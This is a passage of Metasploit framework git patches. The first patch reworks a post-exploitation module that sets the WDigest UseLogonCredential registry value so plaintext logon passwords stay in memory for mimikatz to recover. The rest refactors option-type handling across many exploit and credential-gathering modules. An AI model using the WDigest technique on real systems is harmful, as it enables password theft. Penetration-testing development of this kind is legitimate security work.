print_status("#{verb} UseLogonCredential DWORD value as 1...") + print_status("#{verb} #{USE_LOGON_CREDENTIAL} DWORD value as 1...") if registry_setvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL, 1, 'REG_DWORD') print_good('WDigest Security Provider enabled') else From c7f9fbcdfa1f134f1e5c7392410280a1b124f40a Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Sun, 6 Mar 2016 04:31:15 +0000 Subject: [PATCH 489/686] Change to enable/disable --- .../{enable_wdigest.rb => wdigest_caching.rb} | 69 ++++++++++++++----- 1 file changed, 52 insertions(+), 17 deletions(-) rename modules/post/windows/manage/{enable_wdigest.rb => wdigest_caching.rb} (54%) diff --git a/modules/post/windows/manage/enable_wdigest.rb b/modules/post/windows/manage/wdigest_caching.rb similarity index 54% rename from modules/post/windows/manage/enable_wdigest.rb rename to modules/post/windows/manage/wdigest_caching.rb index 283ee5eb02..764f37ffca 100644 --- a/modules/post/windows/manage/enable_wdigest.rb +++ b/modules/post/windows/manage/wdigest_caching.rb @@ -13,9 +13,9 @@ class Metasploit3 < Msf::Post def initialize(info = {}) super(update_info(info, - 'Name' => 'Windows Post Manage Enable WDigest Credential Caching', + 'Name' => 'Windows Post Manage WDigest Credential Caching', 'Description' => %q{ - On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables + On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables credential caching by adding/changing the value of the UseLogonCredential DWORD under WDIGEST provider's Registry key. Any subsequest logins will allow mimikatz to recover the plain text passwords from the system's memory. }, @@ -24,6 +24,11 @@ class Metasploit3 < Msf::Post 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) + + register_options( + [ + OptBool.new('ENABLE',[false,'Enable the WDigest Credential Cache.',true]) + ], self.class) end # Run Method for when run command is issued @@ -34,11 +39,11 @@ class Metasploit3 < Msf::Post if sysinfo['OS'] =~ /Windows (XP|Vista|200[03])/i print_status('Older Windows version detected. No need to enable the WDigest Security Provider. Exiting...') else - wdigest_enable + datastore['ENABLE'] ? wdigest_enable : wdigest_disable end end - def wdigest_enable + def get_key # Check if the key exists. Not present by default print_status("Checking if the #{WDIGEST_REG_LOCATION}\\#{USE_LOGON_CREDENTIAL} DWORD exists...") begin @@ -46,21 +51,51 @@ class Metasploit3 < Msf::Post key_exists = !wdvalue.nil? print_status("#{USE_LOGON_CREDENTIAL} is set to #{wdvalue}") if key_exists - - # If it is not present, create it - if key_exists && wdvalue == 1 - print_good('Registry value is already set. WDigest Security Provider is enabled') - else - verb = key_exists ? 'Setting' : 'Creating' - print_status("#{verb} #{USE_LOGON_CREDENTIAL} DWORD value as 1...") - if registry_setvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL, 1, 'REG_DWORD') - print_good('WDigest Security Provider enabled') - else - print_error('Unable to access registry key - insufficient privileges?') - end - end + return wdvalue rescue Rex::Post::Meterpreter::RequestError => e fail_with(Failure::Unknown, "Unable to access registry key: #{e}") end end + + def wdigest_enable + wdvalue = get_key + key_exists = !wdvalue.nil? + # If it is not present, create it + if key_exists && wdvalue == 1 + print_good('Registry value is already set. WDigest Security Provider is enabled') + else + begin + verb = key_exists ? 'Setting' : 'Creating' + print_status("#{verb} #{USE_LOGON_CREDENTIAL} DWORD value as 1...") + if registry_setvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL, 1, 'REG_DWORD') + print_good('WDigest Security Provider enabled') + else + print_error('Unable to access registry key - insufficient privileges?') + end + rescue Rex::Post::Meterpreter::RequestError => e + fail_with(Failure::Unknown, "Unable to access registry key: #{e}") + end + end + end + + def wdigest_disable + wdvalue = get_key + key_exists = !wdvalue.nil? + # If it is not present, create it + if key_exists && wdvalue == 0 + print_good('Registry value is already set. WDigest Security Provider is disabled') + else + begin + verb = key_exists ? 'Setting' : 'Creating' + print_status("#{verb} #{USE_LOGON_CREDENTIAL} DWORD value as 0...") + if registry_setvaldata(WDIGEST_REG_LOCATION, USE_LOGON_CREDENTIAL, 0, 'REG_DWORD') + print_good('WDigest Security Provider disabled') + else + print_error('Unable to access registry key - insufficient privileges?') + end + rescue Rex::Post::Meterpreter::RequestError => e + fail_with(Failure::Unknown, "Unable to access registry key: #{e}") + end + end + end end From 694f7f0a657e0951ef5cc2f17f9ed35ef88513d4 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Sat, 5 Mar 2016 23:09:14 -0600 Subject: [PATCH 490/686] stop turning all default options into strings we need to adjust vprint* functions, since they now fallthrough to the 'framework.datastore' checks because the false case actually triggers. --- lib/msf/core/data_store.rb | 11 +++-------- lib/msf/core/module/ui/message/verbose.rb | 8 ++++---- 2 files changed, 7 insertions(+), 12 deletions(-) diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index f4da1911e0..db8fcc7fd6 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -66,14 +66,9 @@ class DataStore < Hash # def import_options(options, imported_by = nil, overwrite = false) options.each_option { |name, opt| - # If there's already a value defined for this option, then skip it - # and don't import it. - next if self.has_key?(name) and overwrite == false - - # If the option has a default value, import it, but only if the - # datastore doesn't already have a value set for it. - if ((opt.default != nil) and (overwrite or self[name] == nil)) - import_option(name, opt.default.to_s, true, imported_by) + # Skip options without a default or if is already a value defined + if !opt.default.nil? && (!self.has_key?(name) || overwrite) + import_option(name, opt.default, true, imported_by) end } end diff --git a/lib/msf/core/module/ui/message/verbose.rb b/lib/msf/core/module/ui/message/verbose.rb index 1a8d0175b9..a47a7e8f11 100644 --- a/lib/msf/core/module/ui/message/verbose.rb +++ b/lib/msf/core/module/ui/message/verbose.rb @@ -1,21 +1,21 @@ module Msf::Module::UI::Message::Verbose # Verbose version of #print_error def vprint_error(msg='') - print_error(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_error(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end # Verbose version of #print_good def vprint_good(msg='') - print_good(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_good(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end # Verbose version of #print_status def vprint_status(msg='') - print_status(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_status(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end # Verbose version of #print_warning def vprint_warning(msg='') - print_warning(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_warning(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end end From 85acfabfcac6a9543574ccebe51ca3b3fee5e0e7 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Sat, 5 Mar 2016 23:10:57 -0600 Subject: [PATCH 491/686] remove various library workarounds for the datastore not preserving types --- lib/msf/base/sessions/command_shell.rb | 2 +- lib/msf/base/sessions/meterpreter_options.rb | 8 ++++---- lib/msf/base/sessions/vncinject_options.rb | 2 +- lib/msf/core/encoder.rb | 2 +- lib/msf/core/exploit.rb | 2 +- lib/msf/core/exploit/http/server.rb | 8 ++++---- lib/msf/core/exploit/remote/browser_exploit_server.rb | 2 +- lib/msf/core/exploit/sunrpc.rb | 2 +- lib/msf/core/payload/windows/prepend_migrate.rb | 2 +- lib/msf/ui/console/command_dispatcher/core.rb | 4 ++-- lib/msf/ui/console/command_dispatcher/exploit.rb | 3 +-- lib/msf/ui/console/driver.rb | 8 ++++---- 12 files changed, 22 insertions(+), 23 deletions(-) diff --git a/lib/msf/base/sessions/command_shell.rb b/lib/msf/base/sessions/command_shell.rb index d22ac17dbc..86b5ab5e68 100644 --- a/lib/msf/base/sessions/command_shell.rb +++ b/lib/msf/base/sessions/command_shell.rb @@ -216,7 +216,7 @@ class CommandShell end end - if (datastore['InitialAutoRunScript'] && datastore['InitialAutoRunScript'].empty? == false) + if datastore['InitialAutoRunScript'] && !datastore['InitialAutoRunScript'].empty? args = Shellwords.shellwords( datastore['InitialAutoRunScript'] ) print_status("Session ID #{sid} (#{tunnel_to_s}) processing InitialAutoRunScript '#{datastore['InitialAutoRunScript']}'") execute_script(args.shift, *args) diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb index 789f25c801..b2863874e8 100644 --- a/lib/msf/base/sessions/meterpreter_options.rb +++ b/lib/msf/base/sessions/meterpreter_options.rb @@ -37,13 +37,13 @@ module MeterpreterOptions framework.sessions.schedule Proc.new { # Configure unicode encoding before loading stdapi - session.encode_unicode = ( datastore['EnableUnicodeEncoding'] ? true : false ) + session.encode_unicode = datastore['EnableUnicodeEncoding'] session.init_ui(self.user_input, self.user_output) valid = true - if datastore['AutoVerifySession'] == true + if datastore['AutoVerifySession'] if not session.is_valid_session?(datastore['AutoVerifySessionTimeout'].to_i) print_error("Meterpreter session #{session.sid} is not valid and will be closed") valid = false @@ -52,7 +52,7 @@ module MeterpreterOptions if valid - if datastore['AutoLoadStdapi'] == true + if datastore['AutoLoadStdapi'] session.load_stdapi @@ -72,7 +72,7 @@ module MeterpreterOptions end [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key| - if (datastore[key].empty? == false) + if !datastore[key].empty? args = Shellwords.shellwords( datastore[key] ) print_status("Session ID #{session.sid} (#{session.tunnel_to_s}) processing #{key} '#{datastore[key]}'") session.execute_script(args.shift, *args) diff --git a/lib/msf/base/sessions/vncinject_options.rb b/lib/msf/base/sessions/vncinject_options.rb index 05962133fc..d86a5f4dbd 100644 --- a/lib/msf/base/sessions/vncinject_options.rb +++ b/lib/msf/base/sessions/vncinject_options.rb @@ -84,7 +84,7 @@ module VncInjectOptions print_status("Local TCP relay started.") # If the AUTOVNC flag is set, launch VNC viewer. - if (datastore['AUTOVNC'] == true) + if datastore['AUTOVNC'] if (session.autovnc(datastore['ViewOnly'])) print_status("Launched vncviewer.") else diff --git a/lib/msf/core/encoder.rb b/lib/msf/core/encoder.rb index 076107891e..c483d25358 100644 --- a/lib/msf/core/encoder.rb +++ b/lib/msf/core/encoder.rb @@ -537,7 +537,7 @@ protected # def find_context_key(buf, badchars, state) # Make sure our context information file is sane - if File.exists?(datastore['ContextInformationFile']) == false + if !File.exists?(datastore['ContextInformationFile']) raise NoKeyError, "A context information file must specified when using context encoding", caller end diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb index 7e36ad1a80..f70884cdb3 100644 --- a/lib/msf/core/exploit.rb +++ b/lib/msf/core/exploit.rb @@ -1506,7 +1506,7 @@ protected # required when wanting to support context keyed encoding # def define_context_encoding_reqs(reqs) - return if datastore['EnableContextEncoding'] != true + return unless datastore['EnableContextEncoding'] # At present, we don't support any automatic methods of obtaining # context information. In the future, we might support obtaining diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 6a101b9316..04a91c0263 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -86,7 +86,7 @@ module Exploit::Remote::HttpServer # set. # def use_zlib - if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true) + if !Rex::Text.zlib_present? && datastore['HTTP::compression'] raise RuntimeError, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!" end end @@ -530,16 +530,16 @@ module Exploit::Remote::HttpServer response.compress = datastore['HTTP::compression'] end - if (datastore['HTTP::chunked'] == true) + if datastore['HTTP::chunked'] response.auto_cl = false response.transfer_chunked = true end - if (datastore['HTTP::header_folding'] == true) + if datastore['HTTP::header_folding'] response.headers.fold = 1 end - if (datastore['HTTP::junk_headers'] == true) + if datastore['HTTP::junk_headers'] response.headers.junk_headers = 1 end diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb index 1f6da0ecf5..466f03281c 100644 --- a/lib/msf/core/exploit/remote/browser_exploit_server.rb +++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb @@ -588,7 +588,7 @@ module Msf if profile.nil? print_status("Browsing directly to the exploit URL is forbidden.") send_not_found(cli) - elsif profile[:tried] and datastore['Retries'] == false + elsif profile[:tried] && !datastore['Retries'] print_status("Target with tag \"#{tag}\" wants to retry the module, not allowed.") send_not_found(cli) else diff --git a/lib/msf/core/exploit/sunrpc.rb b/lib/msf/core/exploit/sunrpc.rb index f8c9055f30..25dc07113a 100644 --- a/lib/msf/core/exploit/sunrpc.rb +++ b/lib/msf/core/exploit/sunrpc.rb @@ -65,7 +65,7 @@ module Exploit::Remote::SunRPC } ) - if datastore['ONCRPC::tcp_request_fragmentation'] == true + if datastore['ONCRPC::tcp_request_fragmentation'] self.rpcobj.should_fragment = 1 end diff --git a/lib/msf/core/payload/windows/prepend_migrate.rb b/lib/msf/core/payload/windows/prepend_migrate.rb index 58ad420cfe..b6ccf75131 100644 --- a/lib/msf/core/payload/windows/prepend_migrate.rb +++ b/lib/msf/core/payload/windows/prepend_migrate.rb @@ -28,7 +28,7 @@ module Msf::Payload::Windows::PrependMigrate # for discussion. # def prepend_migrate? - !!(datastore['PrependMigrate'] && datastore['PrependMigrate'].to_s.downcase == 'true') + datastore['PrependMigrate'] end # diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 479e84170e..72aef856a3 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -3516,7 +3516,7 @@ class Core next if not o # handle a search string, search deep - if( + if ( not regex or o.name.match(regex) or o.description.match(regex) or @@ -3530,7 +3530,7 @@ class Core mod_opt_keys = o.options.keys.map { |x| x.downcase } opts.each do |opt,val| - if mod_opt_keys.include?(opt.downcase) == false or (val != nil and o.datastore[opt] != val) + if !mod_opt_keys.include?(opt.downcase) || (val != nil && o.datastore[opt] != val) show = false end end diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index ea7be2c617..fac610ed38 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb @@ -154,8 +154,7 @@ class Exploit else # If we didn't run a payload handler for this exploit it doesn't # make sense to complain to the user that we didn't get a session - disable_handler = /^true$/i === mod.datastore["DisablePayloadHandler"] ? true : false - unless disable_handler + unless mod.datastore["DisablePayloadHandler"] fail_msg = 'Exploit completed, but no session was created.' print_status(fail_msg) begin diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index d2292ba6a9..fa7685c847 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -139,13 +139,13 @@ class Driver < Msf::Ui::Driver self.disable_output = false # Whether or not command passthru should be allowed - self.command_passthru = (opts['AllowCommandPassthru'] == false) ? false : true + self.command_passthru = opts['AllowCommandPassthru'] # Whether or not to confirm before exiting - self.confirm_exit = (opts['ConfirmExit'] == true) ? true : false + self.confirm_exit = opts['ConfirmExit'] # Disables "dangerous" functionality of the console - @defanged = opts['Defanged'] == true + @defanged = opts['Defanged'] # If we're defanged, then command passthru should be disabled if @defanged @@ -652,7 +652,7 @@ protected def unknown_command(method, line) [method, method+".exe"].each do |cmd| - if (command_passthru == true and Rex::FileUtils.find_full_path(cmd)) + if command_passthru && Rex::FileUtils.find_full_path(cmd) print_status("exec: #{line}") print_line('') From c7c0e12bb39eec615c67130f950a264dae6ab18d Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Sat, 5 Mar 2016 23:11:39 -0600 Subject: [PATCH 492/686] remove various module hacks for the datastore defaults not preserving types --- modules/auxiliary/admin/mssql/mssql_enum.rb | 2 +- .../auxiliary/admin/smb/psexec_ntdsgrab.rb | 4 ++-- .../auxiliary/fuzzers/http/http_form_field.rb | 2 +- .../apple_safari_ftp_url_cookie_theft.rb | 2 +- .../gather/safari_file_url_navigation.rb | 2 +- modules/auxiliary/gather/ssllabs_scan.rb | 6 +++--- modules/auxiliary/scanner/http/title.rb | 21 ++++++++++--------- .../scanner/http/tplink_traversal_noauth.rb | 4 ++-- .../auxiliary/scanner/mssql/mssql_hashdump.rb | 2 +- .../scanner/mssql/mssql_schemadump.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_monlist.rb | 4 ++-- .../auxiliary/scanner/smb/smb_enumshares.rb | 2 +- .../scanner/tftp/ipswitch_whatsupgold_tftp.rb | 2 +- modules/encoders/x86/opt_sub.rb | 6 ++---- .../linux/http/symantec_web_gateway_lfi.rb | 2 +- .../exploits/multi/http/cups_bash_env_exec.rb | 8 +++---- .../multi/http/joomla_http_header_rce.rb | 2 +- .../osx/browser/safari_file_policy.rb | 4 ++-- .../unix/webapp/php_vbulletin_template.rb | 2 +- .../exploits/unix/webapp/php_xmlrpc_eval.rb | 2 +- .../sixapart_movabletype_storable_exec.rb | 2 +- .../windows/browser/adobe_flash_otf_font.rb | 6 +++--- .../browser/imgeviewer_tifmergemultifiles.rb | 2 +- .../browser/viscom_movieplayer_drawtext.rb | 2 +- .../windows/browser/winamp_playlist_unc.rb | 4 ++-- .../email/ms10_045_outlook_ref_only.rb | 2 +- .../fileformat/foxit_reader_filewrite.rb | 2 +- .../windows/fileformat/foxit_reader_launch.rb | 2 +- .../windows/fileformat/free_mp3_ripper_wav.rb | 2 +- .../fileformat/galan_fileformat_bof.rb | 2 +- .../fileformat/hhw_hhp_compiledfile_bof.rb | 2 +- .../fileformat/hhw_hhp_contentfile_bof.rb | 2 +- .../fileformat/hhw_hhp_indexfile_bof.rb | 2 +- .../windows/fileformat/ideal_migration_ipj.rb | 2 +- .../mcafee_hercules_deletesnapshot.rb | 2 +- .../fileformat/mcafee_showreport_exec.rb | 2 +- .../windows/fileformat/mediajukebox.rb | 2 +- .../windows/fileformat/microp_mppl.rb | 2 +- .../exploits/windows/fileformat/ms12_005.rb | 4 ++-- .../windows/fileformat/ms13_071_theme.rb | 2 +- .../windows/fileformat/ms15_100_mcl_exe.rb | 2 +- .../exploits/windows/ftp/scriptftp_list.rb | 2 +- .../windows/iis/ms03_007_ntdll_webdav.rb | 2 +- .../mssql/ms09_004_sp_replwritetovarbin.rb | 4 ++-- .../windows/mssql/mssql_linkcrawler.rb | 16 +++++++------- .../exploits/windows/mssql/mssql_payload.rb | 4 ++-- .../windows/scada/codesys_web_server.rb | 2 +- modules/payloads/stages/osx/x86/isight.rb | 2 +- .../gather/credentials/filezilla_server.rb | 15 ++++++------- .../post/windows/gather/credentials/imail.rb | 2 +- modules/post/windows/gather/enum_chrome.rb | 4 ++-- .../post/windows/manage/add_user_domain.rb | 17 +++++++-------- .../windows/manage/mssql_local_auth_bypass.rb | 2 +- modules/post/windows/manage/rpcapd_start.rb | 6 +++--- modules/post/windows/manage/sdel.rb | 2 +- 55 files changed, 103 insertions(+), 108 deletions(-) diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb index b7272a17cc..718a123b1e 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum.rb @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary def run print_status("Running MS SQL Server Enumeration...") - if mssql_login_datastore == false + if !mssql_login_datastore print_error("Login was unsuccessful. Check your credentials.") disconnect return diff --git a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb index ed89e046a5..49109956f9 100644 --- a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb +++ b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']), OptString.new('VSCPATH', [false, 'The path to the target Volume Shadow Copy', '']), OptString.new('WINPATH', [true, 'The name of the Windows directory (examples: WINDOWS, WINNT)', 'WINDOWS']), - OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', 'false']), + OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', false]), ], self.class) end @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Attempting to copy NTDS.dit from #{datastore['VSCPATH']}") vscpath = datastore['VSCPATH'] else - unless datastore['CREATE_NEW_VSC'] == true + unless datastore['CREATE_NEW_VSC'] vscpath = check_vss(text, bat) end unless vscpath diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb index b115f6dd62..4751df0e78 100644 --- a/modules/auxiliary/fuzzers/http/http_form_field.rb +++ b/modules/auxiliary/fuzzers/http/http_form_field.rb @@ -538,7 +538,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Done fuzzing fields in form #{thisform[:name].upcase.strip}") end # fuzz headers ? - if datastore['FUZZHEADERS'] == true + if datastore['FUZZHEADERS'] print_status("Fuzzing header fields") do_fuzz_headers(thisform,response.headers) end diff --git a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb index af2359c05b..cd822af1ac 100644 --- a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb +++ b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb @@ -172,7 +172,7 @@ class Metasploit3 < Msf::Auxiliary # set. # def use_zlib - unless Rex::Text.zlib_present? || datastore['HTTP::compression'] == false + unless Rex::Text.zlib_present? || !datastore['HTTP::compression'] fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!") end end diff --git a/modules/auxiliary/gather/safari_file_url_navigation.rb b/modules/auxiliary/gather/safari_file_url_navigation.rb index bd2c72c701..293f33d4b1 100644 --- a/modules/auxiliary/gather/safari_file_url_navigation.rb +++ b/modules/auxiliary/gather/safari_file_url_navigation.rb @@ -286,7 +286,7 @@ class Metasploit3 < Msf::Auxiliary # set. # def use_zlib - if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true) + if !Rex::Text.zlib_present? && datastore['HTTP::compression'] fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!") end end diff --git a/modules/auxiliary/gather/ssllabs_scan.rb b/modules/auxiliary/gather/ssllabs_scan.rb index 316dd0886a..1caf5b39e7 100644 --- a/modules/auxiliary/gather/ssllabs_scan.rb +++ b/modules/auxiliary/gather/ssllabs_scan.rb @@ -437,9 +437,9 @@ class Metasploit3 < Msf::Auxiliary [ OptString.new('HOSTNAME', [true, 'The target hostname']), OptInt.new('DELAY', [true, 'The delay in seconds between API requests', 5]), - OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', 'true']), - OptBool.new('GRADE', [true, 'Output only the hostname: grade', 'false']), - OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', 'true']) + OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', true]), + OptBool.new('GRADE', [true, 'Output only the hostname: grade', false]), + OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', true]) ], self.class) end diff --git a/modules/auxiliary/scanner/http/title.rb b/modules/auxiliary/scanner/http/title.rb index 4b573346ae..5743bb0b97 100644 --- a/modules/auxiliary/scanner/http/title.rb +++ b/modules/auxiliary/scanner/http/title.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptBool.new('STORE_NOTES', [ true, 'Store the captured information in notes. Use "notes -t http.title" to view', true ]), - OptBool.new('SHOW_ERRORS', [ true, 'Show error messages relating to grabbing titles on the console', true ]), OptBool.new('SHOW_TITLES', [ true, 'Show the titles on the console as they are grabbed', true ]), OptString.new('TARGETURI', [true, 'The base path', '/']) ], self.class) @@ -35,8 +34,8 @@ class Metasploit3 < Msf::Auxiliary end def run - if datastore['STORE_NOTES'] == false && datastore['SHOW_ERRORS'] == false && datastore['SHOW_TITLES'] == false - print_error("Notes storage is false, errors have been turned off and titles are not being shown on the console. There isn't much point in running this module.") + if !datastore['STORE_NOTES'] && !datastore['SHOW_TITLES'] + print_error("Notes storage is false and titles are not being shown on the console. There isn't much point in running this module.") else super end @@ -51,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary # If no response, quit now if res.nil? - print_error("[#{target_host}:#{rport}] No response") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No response") return end @@ -65,12 +64,12 @@ class Metasploit3 < Msf::Auxiliary server_header = val if key.downcase == 'server' end else - print_error("[#{target_host}:#{rport}] No HTTP headers") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No HTTP headers") end # If the body is blank, just stop now as there is no chance of a title if res.body.nil? - print_error("[#{target_host}:#{rport}] No webpage body") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No webpage body") return end @@ -78,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary # there is no chance that we will have a title rx = %r{<title>[\n\t\s]*(?<title>.+?)[\s\n\t]*}im.match(res.body.to_s) unless rx - print_error("[#{target_host}:#{rport}] No webpage title") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No webpage title") return end @@ -86,13 +85,15 @@ class Metasploit3 < Msf::Auxiliary rx[:title].strip! if rx[:title] != '' rx_title = Rex::Text.html_decode(rx[:title]) - print_status("[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}") if datastore['SHOW_TITLES'] == true - if datastore['STORE_NOTES'] == true + if datastore['SHOW_TITLES'] + print_status("[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}") + end + if datastore['STORE_NOTES'] notedata = { code: res.code, port: rport, server: server_header, title: rx_title, redirect: location_header, uri: datastore['TARGETURI'] } report_note(host: target_host, port: rport, type: "http.title", data: notedata, update: :unique_data) end else - print_error("[#{target_host}:#{rport}] No webpage title") if datastore['SHOW_ERRORS'] == true + vprint_error("[#{target_host}:#{rport}] No webpage title") end end diff --git a/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb b/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb index c4541ac09f..abfa119e7b 100644 --- a/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb +++ b/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary loot = store_loot("tplink.traversal.data","text/plain",rhost, res.body,file) vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") - if datastore['VERBOSE'] == true + if datastore['VERBOSE'] vprint_good("#{rhost}:#{rport} - Response - File #{file}:") res.body.each_line do |line| # the following is the last line of the useless response @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Auxiliary end out = false end - elsif (res and res.code) + elsif res && res.code vprint_error("#{rhost}:#{rport} - File->#{file} not found") end end diff --git a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb index 5180dc687f..0dfce821e3 100644 --- a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - if (not mssql_login_datastore) + if !mssql_login_datastore print_error("#{rhost}:#{rport} - Invalid SQL Server credentials") return end diff --git a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb index 628a8fdb86..31d1ed9c2a 100644 --- a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - if (not mssql_login_datastore) + if !mssql_login_datastore print_error("#{rhost}:#{rport} - Invalid SQL Server credentials") return end diff --git a/modules/auxiliary/scanner/ntp/ntp_monlist.rb b/modules/auxiliary/scanner/ntp/ntp_monlist.rb index ba17c40926..ffe05f33de 100644 --- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb +++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb @@ -37,12 +37,12 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptInt.new('RETRY', [false, "Number of tries to query the NTP server", 3]), - OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', 'false']) + OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', false]) ], self.class) register_advanced_options( [ - OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', 'false']) + OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', false]) ], self.class) end diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb index e4118ded74..e642dfb8ba 100644 --- a/modules/auxiliary/scanner/smb/smb_enumshares.rb +++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb @@ -408,7 +408,7 @@ class Metasploit3 < Msf::Auxiliary end subdirs.shift end - print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['ShowFiles'] == true + print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['ShowFiles'] end unless detailed_tbl.rows.empty? if datastore['LogSpider'] == '1' diff --git a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb index dc1e190457..83758980bb 100644 --- 